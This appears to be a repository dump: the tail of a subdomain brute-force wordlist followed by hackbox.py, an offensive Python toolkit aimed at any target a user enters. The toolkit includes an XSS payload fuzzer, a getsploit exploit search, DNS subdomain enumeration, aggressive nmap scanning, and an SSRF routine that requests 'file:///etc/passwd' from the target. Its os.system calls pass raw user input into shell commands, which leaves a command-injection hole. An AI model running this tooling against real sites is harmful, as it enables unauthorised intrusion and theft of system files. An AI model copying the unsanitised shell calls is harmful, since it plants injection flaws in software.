1140 | z 1141 | securemail 1142 | www-test 1143 | wmail 1144 | 123 1145 | sonic 1146 | netflow 1147 | enterprise 1148 | extra 1149 | webdesign 1150 | reporting 1151 | libguides 1152 | oldsite 1153 | autodiscover.secure 1154 | check 1155 | webdisk.secure 1156 | luna 1157 | www11 1158 | down 1159 | odin 1160 | ent 1161 | web10 1162 | international 1163 | fw2 1164 | leo 1165 | pegasus 1166 | mailbox 1167 | aaa 1168 | com 1169 | acs 1170 | vdi 1171 | inventory 1172 | simple 1173 | e-learning 1174 | fire 1175 | cb 1176 | WWW 1177 | edi 1178 | rsc 1179 | yellow 1180 | www.sklep 1181 | www.social 1182 | webmail.cpanel 1183 | act 1184 | bc 1185 | portfolio 1186 | hb 1187 | smtp01 1188 | cafe 1189 | nexus 1190 | www.edu 1191 | ping 1192 | movil 1193 | as2 1194 | builder.control 1195 | autoconfig.secure 1196 | payments 1197 | cdn1 1198 | srv3 1199 | openvpn 1200 | tm 1201 | cisco-capwap-controller 1202 | dolphin 1203 | webmail3 1204 | minerva 1205 | co 1206 | wwwold 1207 | hotspot 1208 | super 1209 | products 1210 | nova 1211 | r1 1212 | blackberry 1213 | mike 1214 | pe 1215 | acc 1216 | lion 1217 | tp 1218 | tiger 1219 | stream1 1220 | www12 1221 | admin1 1222 | mx5 1223 | server01 1224 | webdisk.forums 1225 | notes 1226 | suporte 1227 | focus 1228 | km 1229 | speed 1230 | rd 1231 | lyncweb 1232 | builder.cpanel 1233 | pa 1234 | mx10 1235 | www.files 1236 | fi 1237 | konkurs 1238 | broadcast 1239 | a1 1240 | build 1241 | earth 1242 | webhost 1243 | www.blogs 1244 | aurora 1245 | review 1246 | mg 1247 | license 1248 | homer 1249 | servicedesk 1250 | webcon 1251 | db01 1252 | dns6 1253 | cfd297 1254 | spider 1255 | expo 1256 | newsletters 1257 | h 1258 | ems 1259 | city 1260 | lotus 1261 | fun 1262 | autoconfig.webmail 1263 | statistics 1264 | ams 1265 | all.videocdn 1266 | autodiscover.shop 1267 | autoconfig.shop 1268 | tfs 1269 | www.billing 1270 | happy 1271 | cl 1272 | sigma 1273 | jwc 1274 | dream 1275 | sv2 1276 | wms 1277 | one 1278 | ls 1279 | europa 1280 | ldap2 1281 | a4 1282 | merlin 1283 | buy 1284 | web11 1285 | dk 1286 | autodiscover.webmail 1287 | ro 1288 | widgets 1289 | sql2 1290 | mysql3 1291 | gmail 1292 | selfservice 1293 | sdc 1294 | tt 1295 | mailrelay 1296 | a.ns 1297 | ns19 1298 | webstats 1299 | plesk 1300 | nsk 1301 | test6 1302 | class 1303 | agenda 1304 | adam 1305 | german 1306 | www.v2 1307 | renew 1308 | car 1309 | correio 1310 | bk 1311 | db3 1312 | voice 1313 | sentry 1314 | alt 1315 | demeter 1316 | www.projects 1317 | mail8 1318 | bounce 1319 | tc 1320 | oldwww 1321 | www.directory 1322 | uploads 1323 | carbon 1324 | all 1325 | mark 1326 | bbb 1327 | eco 1328 | 3g 1329 | testmail 1330 | ms2 1331 | node2 1332 | template 1333 | andromeda 1334 | www.photo 1335 | media2 1336 | articles 1337 | yoda 1338 | sec 1339 | active 1340 | nemesis 1341 | autoconfig.new 1342 | autodiscover.new 1343 | push 1344 | enews 1345 | advertising 1346 | mail9 1347 | api2 1348 | david 1349 | source 1350 | kino 1351 | prime 1352 | o 1353 | vb 1354 | testsite 1355 | fm 1356 | c4anvn3 1357 | samara 1358 | reklama 1359 | made.by 1360 | sis 1361 | q 1362 | mp 1363 | newton 1364 | elearn 1365 | autodiscover.beta 1366 | cursos 1367 | filter 1368 | autoconfig.beta 1369 | news2 1370 | mf 1371 | ubuntu 1372 | ed 1373 | zs 1374 | a.mx 1375 | center 1376 | www.sandbox 1377 | img5 1378 | translate 1379 | webmail.control 1380 | mail0 1381 | smtp02 1382 | s6 1383 | dallas 1384 | bob 1385 | autoconfig.store 1386 | stu 1387 | recruit 1388 | mailtest 1389 | reviews 1390 | autodiscover.store 1391 | 2011 1392 | www.iphone 1393 | fp 1394 | d3 1395 | rdp 1396 | www.design 1397 | test7 1398 | bg 1399 | console 1400 | outbound 1401 | jpkc 1402 | ext 1403 | invest 1404 | web8 1405 | testvb 1406 | vm1 1407 | family 1408 | insurance 1409 | atlanta 1410 | aqua 1411 | film 1412 | dp 1413 | ws2 1414 | webdisk.cdn 1415 | www.wordpress 1416 | webdisk.news 1417 | at 1418 | ocean 1419 | dr 1420 | yahoo 1421 | s8 1422 | host2123 1423 | libra 1424 | rose 1425 | cloud1 1426 | album 1427 | 3 1428 | antares 1429 | www.a 1430 | ipv6 1431 | bridge 1432 | demos 1433 | cabinet 1434 | crl 1435 | old2 1436 | angel 1437 | cis 1438 | www.panel 1439 | isis 1440 | s7 1441 | guide 1442 | webinar 1443 | pop2 1444 | cdn101 1445 | company 1446 | express 1447 | special 1448 | loki 1449 | accounts 1450 | video1 1451 | expert 1452 | clientes 1453 | p1 1454 | loja 1455 | blog2 1456 | img6 1457 | l 1458 | mail12 1459 | style 1460 | hcm 1461 | s11 1462 | mobile2 1463 | triton 1464 | s12 1465 | kr 1466 | www.links 1467 | s13 1468 | friends 1469 | www.office 1470 | shadow 1471 | mymail 1472 | autoconfig.forums 1473 | ns03 1474 | neu 1475 | autodiscover.forums 1476 | www.home 1477 | root 1478 | upgrade 1479 | puppet 1480 | storm 1481 | www.service 1482 | isp 1483 | get 1484 | foro 1485 | mytest 1486 | test10 1487 | desktop 1488 | po 1489 | mac 1490 | www.member 1491 | ph 1492 | blackboard 1493 | dspace 1494 | dev01 1495 | ftp4 1496 | testwww 1497 | presse 1498 | ldap1 1499 | rock 1500 | wow 1501 | sw 1502 | msn 1503 | mas 1504 | scm 1505 | its 1506 | vision 1507 | tms 1508 | www.wp 1509 | hyperion 1510 | nic 1511 | html 1512 | sale 1513 | isp-caledon.cit 1514 | www.go 1515 | do 1516 | media1 1517 | web9 1518 | ua 1519 | energy 1520 | helios 1521 | chicago 1522 | webftp 1523 | i1 1524 | commerce 1525 | www.ru 1526 | union 1527 | netmon 1528 | audit 1529 | vm2 1530 | mailx 1531 | web12 1532 | painelstats 1533 | sol 1534 | z-hn.nhac 1535 | kvm2 1536 | chris 1537 | www.board 1538 | apache 1539 | tube 1540 | marvin 1541 | bug 1542 | external 1543 | pki 1544 | viper 1545 | webadmin 1546 | production 1547 | r2 1548 | win2 1549 | vpstun 1550 | mx03 1551 | ios 1552 | www.uk 1553 | smile 1554 | www.fb 1555 | aa 1556 | www13 1557 | trinity 1558 | www.upload 1559 | www.testing 1560 | amazon 1561 | hosting2 1562 | bip 1563 | mw 1564 | www.health 1565 | india 1566 | web04 1567 | rainbow 1568 | cisco-lwapp-controller 1569 | uranus 1570 | qr 1571 | domaindnszones 1572 | editor 1573 | www.stage 1574 | manual 1575 | nice 1576 | robin 1577 | gandalf 1578 | j 1579 | buzz 1580 | password 1581 | autoconfig.mobile 1582 | gb 1583 | idea 1584 | eva 1585 | www.i 1586 | server6 1587 | www.job 1588 | results 1589 | www.test1 1590 | maya 1591 | pix 1592 | www.cn 1593 | gz 1594 | th 1595 | www.lib 1596 | autodiscover.mobile 1597 | b1 1598 | horus 1599 | zero 1600 | sv1 1601 | wptest 1602 | cart 1603 | brain 1604 | mbox 1605 | bd 1606 | tester 1607 | fotos 1608 | ess 1609 | ns31 1610 | blogx.dev 1611 | ceres 1612 | gatekeeper 1613 | csr 1614 | www.cs 1615 | sakura 1616 | chef 1617 | parking 1618 | idc 1619 | desarrollo 1620 | mirrors 1621 | sunny 1622 | kvm1 1623 | prtg 1624 | mo 1625 | dns0 1626 | chaos 1627 | avatar 1628 | alice 1629 | task 1630 | www.app 1631 | dev4 1632 | sl 1633 | sugarcrm 1634 | youtube 1635 | ic-vss6509-gw 1636 | simon 1637 | m4 1638 | dexter 1639 | crystal 1640 | terra 1641 | fa 1642 | server7 1643 | journals 1644 | iron 1645 | uc 1646 | pruebas 1647 | magic 1648 | ead 1649 | www.helpdesk 1650 | 4 1651 | server10 1652 | computer 1653 | galileo 1654 | delivery 1655 | aff 1656 | aries 1657 | www.development 1658 | el 1659 | livechat 1660 | host4 1661 | static3 1662 | www.free 1663 | sk 1664 | puma 1665 | coffee 1666 | gh 1667 | java 1668 | fish 1669 | templates 1670 | tarbaby 1671 | mtest 1672 | light 1673 | www.link 1674 | sas 1675 | poll 1676 | director 1677 | destiny 1678 | aquarius 1679 | vps3 1680 | bravo 1681 | freedom 1682 | boutique 1683 | lite 1684 | ns25 1685 | shop2 1686 | ic 1687 | foundation 1688 | cw 1689 | ras 1690 | park 1691 | next 1692 | diana 1693 | secure1 1694 | k 1695 | euro 1696 | managedomain 1697 | castor 1698 | www-old 1699 | charon 1700 | nas1 1701 | la 1702 | jw 1703 | s10 1704 | web13 1705 | mxbackup2 1706 | europe 1707 | oasis 1708 | donate 1709 | s9 1710 | ftps 1711 | falcon 1712 | DomainDnsZones 1713 | depot 1714 | NS1 1715 | genesis 1716 | mysql4 1717 | rms 1718 | ns30 1719 | www.drupal 1720 | wholesale 1721 | ForestDnsZones 1722 | www.alumni 1723 | marketplace 1724 | tesla 1725 | statistik 1726 | country 1727 | imap4 1728 | brand 1729 | gift 1730 | shell 1731 | www.dev2 1732 | apply 1733 | forestdnszones 1734 | nc 1735 | kronos 1736 | epsilon 1737 | testserver 1738 | smtp-out 1739 | pictures 1740 | autos 1741 | org 1742 | mysql5 1743 | france 1744 | shared 1745 | cf 1746 | sos 1747 | stun 1748 | channel 1749 | 2013 1750 | moto 1751 | pw 1752 | oc.pool 1753 | eu.pool 1754 | na.pool 1755 | cams 1756 | www.auto 1757 | pi 1758 | image2 1759 | test8 1760 | hi 1761 | casino 1762 | magazin 1763 | wwwhost-roe001 1764 | z-hcm.nhac 1765 | trial 1766 | cam1 1767 | victor 1768 | sig 1769 | ctrl 1770 | wwwhost-ox001 1771 | weblog 1772 | rds 1773 | first 1774 | farm 1775 | whatsup 1776 | panda 1777 | dummy 1778 | stream.origin 1779 | canada 1780 | wc 1781 | flv 1782 | www.top 1783 | emerald 1784 | sim 1785 | ace 1786 | sap 1787 | ga 1788 | bank 1789 | et 1790 | soap 1791 | guest 1792 | mdev 1793 | www.client 1794 | www.partner 1795 | easy 1796 | st1 1797 | webvpn 1798 | baby 1799 | s14 1800 | delivery.a 1801 | wwwhost-port001 1802 | hideip 1803 | graphics 1804 | webshop 1805 | catalogue 1806 | tom 1807 | rm 1808 | perm 1809 | www.ad 1810 | ad1 1811 | mail03 1812 | www.sports 1813 | water 1814 | intranet2 1815 | autodiscover.news 1816 | bj 1817 | nsb 1818 | charge 1819 | export 1820 | testweb 1821 | sample 1822 | quit 1823 | proxy3 1824 | email2 1825 | b2 1826 | servicios 1827 | novo 1828 | new2 1829 | meta 1830 | secure3 1831 | ajax 1832 | autoconfig.news 1833 | ghost 1834 | www.cp 1835 | good 1836 | bookstore 1837 | kiwi 1838 | ft 1839 | demo4 1840 | www.archive 1841 | squid 1842 | publish 1843 | west 1844 | football 1845 | printer 1846 | cv 1847 | ny 1848 | boss 1849 | smtp5 1850 | rsync 1851 | sip2 1852 | ks 1853 | leon 1854 | a3 1855 | mta1 1856 | epay 1857 | tst 1858 | mgmt 1859 | deals 1860 | dropbox 1861 | www.books 1862 | 2010 1863 | torrent 1864 | webdisk.ads 1865 | mx6 1866 | www.art 1867 | chem 1868 | iproxy 1869 | www.pay 1870 | anime 1871 | ccc 1872 | anna 1873 | ns23 1874 | hs 1875 | cg 1876 | acm 1877 | pollux 1878 | lt 1879 | meteo 1880 | owncloud 1881 | andrew 1882 | v4 1883 | www-dev 1884 | oxygen 1885 | jaguar 1886 | panther 1887 | personal 1888 | ab 1889 | dcp 1890 | med 1891 | www.joomla 1892 | john 1893 | watson 1894 | motor 1895 | mails 1896 | kiev 1897 | asia 1898 | campaign 1899 | win1 1900 | cards 1901 | fantasy 1902 | tj 1903 | martin 1904 | helium 1905 | nfs 1906 | ads2 1907 | script 1908 | anubis 1909 | imail 1910 | cp2 1911 | mk 1912 | bw 1913 | em 1914 | creative 1915 | www.elearning 1916 | ad2 1917 | stars 1918 | discovery 1919 | friend 1920 | reservations 1921 | buffalo 1922 | cdp 1923 | uxs2r 1924 | atom 1925 | cosmos 1926 | www.business 1927 | a2 1928 | xcb 1929 | allegro 1930 | om 1931 | ufa 1932 | dw 1933 | cool 1934 | files2 1935 | webdisk.chat 1936 | ford 1937 | oma 1938 | zzb 1939 | staging2 1940 | texas 1941 | ib 1942 | cwc 1943 | aphrodite 1944 | re 1945 | spark 1946 | www.ftp 1947 | oscar 1948 | atlantis 1949 | osiris 1950 | os 1951 | m5 1952 | dl1 1953 | www.shopping 1954 | ice 1955 | beta1 1956 | mcu 1957 | inter 1958 | interface 1959 | gm 1960 | kiosk 1961 | so 1962 | dss 1963 | www.survey 1964 | customers 1965 | fx 1966 | nsa 1967 | csg 1968 | mi 1969 | url 1970 | dl2 1971 | NS2 1972 | show 1973 | www.classifieds 1974 | mexico 1975 | knowledge 1976 | frank 1977 | tests 1978 | accounting 1979 | krasnodar 1980 | um 1981 | hc 1982 | www.nl 1983 | echo 1984 | property 1985 | gms 1986 | london 1987 | www.clients 1988 | academy 1989 | cyber 1990 | www.english 1991 | museum 1992 | poker 1993 | www.downloads 1994 | gp 1995 | cr 1996 | arch 1997 | gd 1998 | virgo 1999 | si 2000 | smtp-relay 2001 | -------------------------------------------------------------------------------- /hackbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | # !Author: Suleman Malik 4 | # !Contact: samhax@protonmail.com 5 | 6 | from __future__ import print_function 7 | 8 | import os 9 | import random 10 | import re 11 | import sys 12 | import time 13 | import traceback 14 | from datetime import datetime 15 | from string import whitespace 16 | from threading import Thread 17 | 18 | import dns.resolver 19 | import requests 20 | from colorama import Fore, Style 21 | 22 | try: 23 | import urlparse 24 | except ImportError: 25 | import urllib.parse as urlparse 26 | try: 27 | import queue 28 | except ImportError: 29 | import Queue as queue 30 | 31 | try: 32 | input = raw_input 33 | except NameError: 34 | pass 35 | 36 | try: 37 | import readline 38 | readline.parse_and_bind("tab: complete") 39 | except ImportError: 40 | pass 41 | 42 | # CONSTANTS 43 | GOOD = "[+] " 44 | INFO = "[!] " 45 | NEWLINE = "\n" 46 | NOT_VULNERABLE = "Not Vulnerable" 47 | 48 | 49 | def line(): 50 | print("====================================") 51 | 52 | 53 | def xss(): 54 | def list_import(file): 55 | try: 56 | # Importing Payloads from specified wordlist. 57 | with open(file, 'r') as list_file: 58 | content = list_file.readlines() 59 | return [x.strip() for x in content] 60 | except IOError: 61 | print(Style.BRIGHT + Fore.RED + INFO + 62 | "List not found!" + Style.RESET_ALL) 63 | return list() 64 | 65 | def params_check(params, statuses): 66 | try: 67 | dashes1 = str() 68 | dashes2 = str() 69 | lostatus = str() 70 | nums = [] 71 | num_of_params = len(max(params, key=len)) 72 | if num_of_params < 10: 73 | num_of_params = 10 74 | for index in range(len(params)): 75 | nums.append(index) 76 | maxval = str(len(nums)) # number 77 | for _ in range(num_of_params): 78 | dashes2 += "-" 79 | for _ in range(len(maxval)): 80 | dashes1 += "-" 81 | statuslen = len(max(statuses, key=len)) 82 | for _ in range(statuslen): 83 | lostatus += "-" 84 | if len(dashes2) < 10: 85 | dashes2 = "----------" 86 | if len(lostatus) < 14: 87 | lostatus = "--------------" 88 | if len(dashes1) < 2: 89 | dashes1 = "-" 90 | los = statuslen 91 | if los < 14: 92 | los = 14 93 | upb = ("+-%s-+-%s-+-%s-+") % (dashes1, dashes2, lostatus) 94 | print(upb) 95 | print("| # | " + "Param".center(num_of_params, " ") + 96 | " | " + "Status".center(los, " ") + " |") 97 | print(upb) 98 | for num, param, status in zip(nums, params, statuses): 99 | # string = (" %s | %s ") % (str(num), str(param)) 100 | lofnum = str(num).center(int(len(dashes1)), " ") 101 | lofstr = param.center(num_of_params, " ") 102 | lofst = status.center(los, " ") 103 | if NOT_VULNERABLE in lofst: 104 | lofst = Fore.GREEN + \ 105 | status.center(los, " ") + Style.RESET_ALL 106 | else: 107 | lofst = Fore.RED + \ 108 | status.center(los, " ") + Style.RESET_ALL 109 | print("| " + lofnum + " | " + lofstr + " | " + lofst + " |") 110 | print(upb) 111 | return str() 112 | except ValueError: 113 | print(Style.BRIGHT + Fore.RED + 114 | "No parameters in URL!" + Style.RESET_ALL) 115 | 116 | def complete(params, results, vulnerable, domain): 117 | if vulnerable == 0: 118 | print( 119 | GOOD + "All parameters are " + Style.BRIGHT + Fore.GREEN + NOT_VULNERABLE + Style.RESET_ALL + " to XSS.") 120 | elif vulnerable == 1: 121 | print((GOOD + "%s Parameter is " + Style.BRIGHT + Fore.RED + 122 | "vulnerable" + Style.RESET_ALL + " to XSS.") % vulnerable) 123 | else: 124 | print((GOOD + "%s parameters are " + Style.BRIGHT + Fore.RED + 125 | "vulnerable" + Style.RESET_ALL + " to XSS.") % vulnerable) 126 | print((GOOD + "Scan Result for %s:") % domain) 127 | print(params_check(params, results)) 128 | 129 | def get(): 130 | try: 131 | site = input( 132 | "Enter URL (e.g https://example.com/?id=): ") # Taking URL 133 | if not site.startswith('https://') or site.startswith('http://'): 134 | site = "http://" + site 135 | finalurl = urlparse.urlparse(site) 136 | domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl) 137 | domain = domain0.replace( 138 | "https://", "").replace("http://", "").replace("www.", "").replace("/", "") 139 | print(Style.DIM + Fore.WHITE + 140 | GOOD + "Checking if " + domain + " is available..." + Style.RESET_ALL) 141 | response = requests.get(domain0).text 142 | if not response: 143 | print(Style.BRIGHT + Fore.RED + 144 | INFO + "Site " + domain + " is offline!" + Style.RESET_ALL) 145 | return 146 | print(GOOD + Fore.GREEN + domain + 147 | " is available!!" + Style.RESET_ALL) 148 | 149 | wordlist = input( 150 | "Enter XSS wordlist [Defaults to ./src/wordlist.txt]: ") 151 | if not wordlist: 152 | wordlist = './src/wordlist.txt' 153 | # deafult-word-list-for-xss 154 | payloads = list_import(wordlist) 155 | lop = str(len(payloads)) 156 | print(GOOD + lop + " Payloads loaded..") 157 | parameters = urlparse.parse_qs( 158 | urlparse.urlparse(site).query, keep_blank_values=True) 159 | path = urlparse.urlparse(site).scheme + "://" + urlparse.urlparse(site).netloc + urlparse.urlparse( 160 | site).path 161 | 162 | final_params = list() 163 | final_results = list() 164 | progress = 0 165 | total = 0 166 | # Scanning the parameter. 167 | for param_name in parameters.keys(): 168 | vulnerable = False 169 | print(GOOD + "Now checking '" + param_name + "' param") 170 | final_params.append(str(param_name)) 171 | for payload in payloads: # 172 | validate = payload.translate(whitespace) 173 | if validate == "": 174 | progress += 1 175 | else: 176 | sys.stdout.write( 177 | "\r%s %i / %s payloads tested." % (GOOD, progress + 1, len(payloads))) 178 | sys.stdout.flush() 179 | progress += 1 180 | enc = requests.utils.requote_uri(payload) 181 | data = path + "?" + param_name + \ 182 | "=" + parameters[param_name][0] + enc 183 | page = requests.get(data).text 184 | if payload in page: 185 | print((Style.BRIGHT + Fore.RED + NEWLINE + INFO + "XSS Vulnerability Found! " + NEWLINE + Fore.RED + Style.BRIGHT + INFO + 186 | "Parameter:\t%s" + NEWLINE + Fore.RED + Style.BRIGHT + INFO + "Payload:\t%s" + Style.RESET_ALL) % (param_name, payload)) 187 | final_results.append(" Vulnerable ") 188 | vulnerable = True 189 | total += 1 190 | progress += 1 191 | break 192 | else: 193 | vulnerable = False 194 | if not vulnerable: 195 | print((NEWLINE + GOOD + "'%s' parameter not vulnerable.") % 196 | param_name) 197 | final_results.append(NOT_VULNERABLE) 198 | progress += 1 199 | progress = 0 200 | complete(final_params, final_results, total, domain) 201 | except KeyboardInterrupt: 202 | print(NEWLINE + "Exit...") 203 | 204 | get() 205 | 206 | 207 | def exploits(): 208 | line() 209 | print("EXPLITS") 210 | choice = int(input("[1] Seach Exploits\n[2] Update Pack\n\nChoice: ")) 211 | if choice == 1: 212 | query = input("Search exploit (e.g wordpress): ") 213 | print(NEWLINE + 'Searching exploits...' + NEWLINE) 214 | os.system('getsploit ' + query) 215 | elif choice == 2: 216 | os.system('getsploit --update') 217 | 218 | 219 | def subd(): 220 | version = "1" 221 | build = "0.1" 222 | 223 | class Lookup(Thread): 224 | def __init__(self, in_q, out_q, domain, wildcard=False, resolver_list=list()): 225 | Thread.__init__(self) 226 | self.in_q = in_q 227 | self.out_q = out_q 228 | self.domain = domain 229 | self.wildcard = wildcard 230 | self.resolver_list = resolver_list 231 | self.resolver = dns.resolver.Resolver() 232 | if self.resolver.nameservers: 233 | self.backup_resolver = self.resolver.nameservers 234 | else: 235 | # we must have a resolver, and this is the default resolver on my system... 236 | self.backup_resolver = ['127.0.0.1'] 237 | if self.resolver_list: 238 | self.resolver.nameservers = self.resolver_list 239 | 240 | def check(self, host): 241 | slept = 0 242 | while True: 243 | try: 244 | answer = self.resolver.query(host) 245 | if answer: 246 | return str(answer[0]) 247 | return 248 | except dns.resolver.NXDOMAIN: 249 | return 250 | except (dns.resolver.NoAnswer, dns.resolver.Timeout): 251 | if slept == 4: 252 | # This dns server stopped responding. 253 | # We could be hitting a rate limit. 254 | if self.resolver.nameservers == self.backup_resolver: 255 | # if we are already using the backup_resolver use the resolver_list 256 | self.resolver.nameservers = self.resolver_list 257 | else: 258 | # fall back on the system's dns name server 259 | self.resolver.nameservers = self.backup_resolver 260 | elif slept > 5: 261 | # hmm the backup resolver didn't work, 262 | # so lets go back to the resolver_list provided. 263 | # If the self.backup_resolver list did work, lets stick with it. 264 | self.resolver.nameservers = self.resolver_list 265 | # I don't think we are ever guaranteed a response for a given name. 266 | return 267 | # Hmm, we might have hit a rate limit on a resolver. 268 | time.sleep(1) 269 | slept += 1 270 | except IndexError: 271 | pass 272 | except Exception as error: 273 | raise error 274 | 275 | def run(self): 276 | while True: 277 | sub = self.in_q.get() 278 | # if sub != False: 279 | # print 'Try: %s' % (sub) 280 | if not sub: 281 | # Perpetuate the terminator for all threads to see 282 | self.in_q.put(False) 283 | # Notify the parent of our death of natural causes. 284 | self.out_q.put(False) 285 | break 286 | else: 287 | try: 288 | test = "%s.%s" % (sub, self.domain) 289 | addr = self.check(test) 290 | if addr and addr != self.wildcard: 291 | test = (test, str(addr)) 292 | self.out_q.put(test) 293 | except Exception: 294 | pass 295 | # ++ FUNCTIONS //# 296 | # func Writelog 297 | 298 | def func_writelog(how, logloc, txt): # how: a=append, w=new write 299 | with open(logloc, how) as mylog: 300 | mylog.write(txt) 301 | 302 | def check_resolvers(file_name): 303 | txt = 'Checking sudomains...' 304 | print(txt) 305 | ret = [] 306 | resolver = dns.resolver.Resolver() 307 | res_file = open(file_name).read() 308 | for server in res_file.split(NEWLINE): 309 | server = server.strip() 310 | if server: 311 | resolver.nameservers = [server] 312 | try: 313 | resolver.query("www.google.com") 314 | # should throw an exception before this line. 315 | ret.append(server) 316 | except Exception: 317 | pass 318 | return ret 319 | 320 | def run_target(target, hosts, resolve_list, thread_count, print_numeric): 321 | # The target might have a wildcard dns record... 322 | wildcard = False 323 | try: 324 | resp = dns.resolver.Resolver().query( 325 | "would never be a domain name" + str(random.randint(1, 9999)) + "." + target) 326 | wildcard = str(resp[0]) 327 | except Exception: 328 | pass 329 | in_q = queue.Queue() 330 | out_q = queue.Queue() 331 | for host in hosts: 332 | in_q.put(host) 333 | # Terminate the queue 334 | in_q.put(False) 335 | step_size = int(len(resolve_list) / thread_count) 336 | # Split up the resolver list between the threads. 337 | if step_size <= 0: 338 | step_size = 1 339 | step = 0 340 | for i in range(thread_count): 341 | threads.append(Lookup(in_q, out_q, target, wildcard, 342 | resolve_list[step:step + step_size])) 343 | threads[-1].start() 344 | step += step_size 345 | if step >= len(resolve_list): 346 | step = 0 347 | threads_remaining = thread_count 348 | subdlist = {} 349 | subiplist = {} 350 | i = 0 351 | while True: 352 | try: 353 | domain = out_q.get(True, 10) 354 | # we will get an empty exception before this runs. 355 | if not domain: 356 | threads_remaining -= 1 357 | else: 358 | if not print_numeric: 359 | txt = "%s" % (domain[0]) 360 | func_writelog('a', logloc, txt + NEWLINE) 361 | # print txt 362 | else: 363 | txt = "%s -> %s" % (domain[0], domain[1]) 364 | func_writelog('a', logloc, txt + NEWLINE) 365 | # print(txt) 366 | subdlist[i] = txt 367 | if domain[1] in subiplist.keys(): 368 | subiplist[domain[1]].append(domain[0]) 369 | else: 370 | subiplist[domain[1]] = [domain[0]] 371 | i += 1 372 | except queue.Empty: 373 | pass 374 | # make sure everyone is complete 375 | if threads_remaining <= 0: 376 | print(" ") 377 | print("Done. ") 378 | txt = 'Subdomains found : %s' % (len(subdlist)) 379 | # Alfab. ordered result list 380 | func_writelog('a', logloc, NEWLINE + txt + NEWLINE + 381 | 'Ordered list:' + NEWLINE + '-------------' + NEWLINE) 382 | print(txt) 383 | print(' ') 384 | print('Ordered List:') 385 | for result in sorted(subdlist.values()): 386 | txt = result 387 | func_writelog('a', logloc, str(txt) + NEWLINE) 388 | print(txt) 389 | print(' ') 390 | # IP-ordered result list 391 | txt = "IP-ordered List:" 392 | func_writelog('a', logloc, NEWLINE + txt + 393 | NEWLINE + '----------------' + NEWLINE) 394 | print(txt) 395 | for ips in subiplist: 396 | txt = ips 397 | func_writelog('a', logloc, str(txt) + NEWLINE) 398 | print(txt) 399 | for ipssub in subiplist[ips]: 400 | txt = " |=> %s" % (ipssub) 401 | func_writelog('a', logloc, str(txt) + NEWLINE) 402 | print(txt) 403 | 404 | end = datetime.now() 405 | time_stamp_end = int(time.time()) 406 | duration = int(time_stamp_end) - int(time_stamp_start) 407 | time_end = str(end.year) + "-" + str(end.month) + "-" + str(end.day) + " " + str( 408 | end.hour) + ":" + str(end.minute) + ":" + str(end.second) 409 | txt = "Scan Ended : %s" % (time_end) 410 | txt_b = "Duration : %ss" % (duration) 411 | func_writelog('a', logloc, NEWLINE + txt + NEWLINE) 412 | func_writelog('a', logloc, txt_b + NEWLINE) 413 | print(" ") 414 | print(txt) 415 | print(txt_b) 416 | break 417 | """ 418 | ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS 419 | BEGIN: 420 | """ 421 | # -- Creating default log directory 422 | logdir = "log" 423 | if not os.path.exists(logdir): 424 | os.makedirs(logdir) 425 | txt = "Directory 'log/' created" 426 | print(txt) 427 | """ 428 | :END 429 | ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS 430 | """ 431 | # Target 432 | print(NEWLINE) 433 | target = input("Target domain (eg. example.com): ") 434 | # Subs 435 | subfiles = "", "./src/subs/subs_xs.txt" 436 | choosensub = 1 437 | hosts = open(subfiles[int(choosensub)]).read().split(NEWLINE) 438 | # Action 439 | resolve_list = check_resolvers("cnf/resolvers.txt") 440 | threads = [] 441 | # signal.signal(signal.SIGINT, killme) 442 | target = target.strip() 443 | if target: 444 | """ Every run : create log file """ 445 | # -- Creating log file in directory 'log' --# 446 | now = datetime.now() 447 | time_stamp_start = int(time.time()) 448 | time_start = str(now.year) + "-" + str(now.month) + "-" + str(now.day) + " " + str(now.hour) + ":" + str( 449 | now.minute) + ":" + str(now.second) 450 | logfile = target.replace('.', '_') + '_' + str(now.year) + str(now.month) + str(now.day) + str( 451 | now.hour) + str(now.minute) + str(now.second) + ".log" 452 | print("Creating log : log/%s" % (logfile), end=' ') 453 | logloc = logdir + "/" + logfile 454 | with open(logloc, "w") as mylog: 455 | os.chmod(logloc, 0o660) 456 | mylog.write("Log created - " + version + 457 | " build " + build + NEWLINE + NEWLINE) 458 | print(".... Done") 459 | print(" ") 460 | """ """ 461 | txt = "Scan Started : %s" % (time_start) 462 | func_writelog('a', logloc, txt + NEWLINE + NEWLINE) 463 | print(txt) 464 | print(" ") 465 | # -- Visible IP --# 466 | try: 467 | visible_ip = requests.get( 468 | 'https://cleveridge.org/_exchange/open_files/return_ip.php?s=subd_scanner', verify=False).text 469 | except Exception: 470 | visible_ip = requests.get( 471 | 'https://enabledns.com/ip', verify=False).text 472 | txt = "Visible IP: " + visible_ip 473 | func_writelog("a", logloc, txt + NEWLINE + NEWLINE) 474 | print(txt) 475 | print(' ') 476 | 477 | txt = "Subdomains in %s: " % (target) 478 | func_writelog('a', logloc, txt + NEWLINE) 479 | print(txt) 480 | run_target(target, hosts, resolve_list, 10, True) 481 | menu() 482 | 483 | 484 | def whois_geo(): 485 | who = input('Domain(e.g google.com): ') 486 | whois = requests.get( 487 | 'http://api.hackertarget.com/whois/?q=' + who).text 488 | print(whois) 489 | line() 490 | print("GEOIP LOCATION") 491 | line() 492 | geoip = requests.get( 493 | 'http://api.hackertarget.com/geoip/?q=' + who).text 494 | print(geoip) 495 | line() 496 | 497 | 498 | def ssrf_injection(): 499 | print(NEWLINE) 500 | ssrf = input( 501 | 'Target URL (e.g http://robert-brook.com/parliament/index.php?page=): ') 502 | print("\tGETTING /etc/passwd from system") 503 | ssrf_result = requests.get(ssrf + 'file:///etc/passwd') 504 | if ssrf_result.status_code == 200: 505 | print(ssrf_result.text) 506 | else: 507 | print("SSRF failed on %s" % ssrf_result.url) 508 | print( 509 | NEWLINE + " For detail visit https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF") 510 | 511 | 512 | def nmap_auto_banner(): 513 | target = input('Target Domain/IP (e.g www.google.com): ') 514 | line() 515 | print("\tRUNNING SYSTEM NMAP") 516 | line() 517 | os.system('nmap -sT -sV -sC -PN -A -T5 ' + target) 518 | line() 519 | print("\tTCP PORT SCANING") 520 | line() 521 | tcp = requests.get( 522 | 'http://api.hackertarget.com/nmap/?q=' + target).text 523 | print(tcp) 524 | line() 525 | print("\tSUBNET CALCULATION") 526 | line() 527 | subnet = requests.get( 528 | 'https://api.hackertarget.com/subnetcalc/?q=' + target).text 529 | print(subnet) 530 | 